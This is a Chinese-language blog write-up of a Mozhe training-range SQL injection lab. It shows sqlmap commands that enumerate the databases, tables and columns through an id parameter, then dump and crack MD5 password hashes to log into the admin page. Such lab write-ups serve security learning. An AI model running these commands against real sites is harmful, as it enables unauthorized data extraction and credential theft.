墨者(在线靶场)--sql注入测试(布尔盲注)

这道题目给出一个登录框,需要登陆到后台才能够获取到key

由于手动加上脚本需要不少的时间,这里就直接用sqlmap进行爆破

话不多说,直接开搞!!!

 

首先点击靶场的链接并启动靶场:

SQL注入漏洞测试(布尔盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)

对登陆框测试发现并没有可以注入的地方,于是点击维护通知

 

发现了新大陆---很明显id=1为注入点

 

1.直入主题,用sqlmap对存在的注入点进行测试,爆破出数据库名,发现了名为stormgroup的数据库

sqlmap -u 124.70.71.251:41172/new_list.php?id=1 -dbms mysql -dbs

 

2.利用sqlmap对数据库stormgroup中的表进行爆破,发现名为member的数据库

sqlmap -u 124.70.71.251:41172/new_list.php?id=1 -dbms mysql -D stormgroup --tables

 

3.对数据表为member的列名进行爆破,发现名为name和password的列

sqlmap -u 124.70.71.251:41172/new_list.php?id=1 -dbms mysql -D stormgroup -T member --columns

 

4.对name和password的值进行爆破,发现了两组name均为mozhe的数据,其中password的值为32位的md5加密

sqlmap -u 124.70.71.251:41172/new_list.php?id=1 -dbms mysql -D stormgroup -T member -C name,password --dump

 

用md5在线解密得到的结果如下:

 

 

 

依次使用解密的内容进行登陆,发现账号为mozhe,密码为339801可以登陆,在登陆后台页面可以发现所要的key

 

posted @ 2022-08-01 16:56  嗨克龙  阅读(2657)  评论(0)    收藏  举报